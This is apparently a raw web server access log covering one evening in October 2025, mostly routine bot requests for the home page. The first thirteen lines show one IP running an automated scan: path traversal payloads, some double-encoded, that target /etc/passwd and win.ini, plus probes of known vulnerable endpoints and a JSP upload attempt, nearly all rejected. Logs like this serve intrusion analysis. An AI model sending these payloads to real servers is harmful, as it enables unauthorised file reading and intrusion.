205.185.122.202 - - [19/Oct/2025:21:39:48 +0530] "GET /interlib/report/ShowImage?localPath=../etc/passwd HTTP/1.1" 404 1044
205.185.122.202 - - [19/Oct/2025:21:39:49 +0530] "GET /interlib/report/ShowImage?localPath=C:/Windows/win.ini HTTP/1.1" 404 1044
205.185.122.202 - - [19/Oct/2025:21:39:54 +0530] "GET /AccessAnywhere/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini HTTP/1.1" 404 1362
205.185.122.202 - - [19/Oct/2025:21:39:54 +0530] "GET /AccessAnywhere/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cetc%255cpasswd HTTP/1.1" 404 1352
205.185.122.202 - - [19/Oct/2025:21:39:58 +0530] "GET /admin/protected/selector/server_file/files?folder=/ HTTP/1.1" 404 1078
205.185.122.202 - - [19/Oct/2025:21:40:00 +0530] "POST /wp-json/am-member/license HTTP/1.1" 404 1044
205.185.122.202 - - [19/Oct/2025:21:40:03 +0530] "GET /mobile/DBconfigReader.jsp HTTP/1.1" 404 1044
205.185.122.202 - - [19/Oct/2025:21:40:06 +0530] "PUT /isbcru.jsp/ HTTP/1.1" 403 1004
205.185.122.202 - - [19/Oct/2025:21:40:09 +0530] "POST /ispirit/interface/gateway.php HTTP/1.1" 404 1052
205.185.122.202 - - [19/Oct/2025:21:40:09 +0530] "POST /mac/gateway.php HTTP/1.1" 404 1024
205.185.122.202 - - [19/Oct/2025:21:40:12 +0530] "POST /seeyon/htmlofficeservlet HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:21:40:16 +0530] "GET /general/login_code.php HTTP/1.1" 404 1038
205.185.122.202 - - [19/Oct/2025:21:40:16 +0530] "GET /ispirit/login_code.php HTTP/1.1" 404 1038
204.76.203.212 - - [19/Oct/2025:21:41:26 +0530] "GET / HTTP/1.1" 200 11250
204.76.203.212 - - [19/Oct/2025:21:46:45 +0530] "GET / HTTP/1.1" 200 11250
204.76.203.15 - - [19/Oct/2025:22:03:46 +0530] "GET / HTTP/1.1" 200 11250
204.76.203.15 - - [19/Oct/2025:22:04:56 +0530] "GET / HTTP/1.1" 200 11250
176.65.149.157 - - [19/Oct/2025:22:10:27 +0530] "GET /login HTTP/1.1" 404 1004
45.142.193.27 - - [19/Oct/2025:22:11:54 +0530] "GET / HTTP/1.1" 200 11250
213.209.143.66 - - [19/Oct/2025:22:18:38 +0530] "GET / HTTP/1.1" 200 11250
176.65.149.157 - - [19/Oct/2025:22:20:53 +0530] "GET /login HTTP/1.1" 404 1004
213.209.143.66 - - [19/Oct/2025:22:21:04 +0530] "GET / HTTP/1.1" 200 11250
204.76.203.219 - - [19/Oct/2025:22:25:46 +0530] "GET / HTTP/1.1" 200 11250
204.76.203.219 - - [19/Oct/2025:22:30:23 +0530] "GET / HTTP/1.1" 200 11250
185.247.137.226 - - [19/Oct/2025:22:37:04 +0530] "GET / HTTP/1.1" 200 11250
185.247.137.239 - - [19/Oct/2025:22:37:05 +0530] "GET /favicon.ico HTTP/1.1" 200 21630
45.135.193.2 - - [19/Oct/2025:22:39:37 +0530] "GET /login HTTP/1.1" 404 1004
176.65.149.21 - - [19/Oct/2025:22:39:39 +0530] "GET / HTTP/1.1" 200 11250
176.65.149.21 - - [19/Oct/2025:22:40:09 +0530] "GET / HTTP/1.1" 200 11250
3.132.23.201 - - [19/Oct/2025:22:44:53 +0530] "GET / HTTP/1.1" 200 11250
195.96.129.4 - - [19/Oct/2025:22:45:32 +0530] "GET / HTTP/1.1" 200 11250
3.132.23.201 - - [19/Oct/2025:22:46:16 +0530] "GET / HTTP/1.1" 200 11250
3.132.23.201 - - [19/Oct/2025:22:47:23 +0530] "-" 400 -
3.132.23.201 - - [19/Oct/2025:22:47:41 +0530] "GET / HTTP/1.1" 200 11250
3.132.23.201 - - [19/Oct/2025:22:48:41 +0530] "-" 400 -
45.142.193.27 - - [19/Oct/2025:22:48:58 +0530] "GET / HTTP/1.1" 200 11250
3.132.23.201 - - [19/Oct/2025:22:49:04 +0530] "-" 400 -
3.132.23.201 - - [19/Oct/2025:22:49:44 +0530] "-" 400 -
3.132.23.201 - - [19/Oct/2025:22:50:26 +0530] "-" 400 -
3.132.23.201 - - [19/Oct/2025:22:51:20 +0530] "-" 400 -
195.96.129.4 - - [19/Oct/2025:22:53:53 +0530] "GET / HTTP/1.1" 200 11250
204.76.203.15 - - [19/Oct/2025:23:02:13 +0530] "GET / HTTP/1.1" 200 11250
204.76.203.15 - - [19/Oct/2025:23:04:41 +0530] "GET / HTTP/1.1" 200 11250
194.165.16.167 - - [19/Oct/2025:23:12:04 +0530] "-" 400 -
87.120.191.84 - - [19/Oct/2025:23:22:25 +0530] "GET / HTTP/1.1" 200 11250
99.217.118.193 - - [19/Oct/2025:23:36:46 +0530] "GET / HTTP/1.1" 200 11250
87.120.191.84 - - [19/Oct/2025:23:38:38 +0530] "GET / HTTP/1.1" 200 11250
176.65.149.21 - - [19/Oct/2025:23:53:59 +0530] "GET / HTTP/1.1" 200 11250
176.65.149.21 - - [19/Oct/2025:23:54:07 +0530] "GET / HTTP/1.1" 200 11250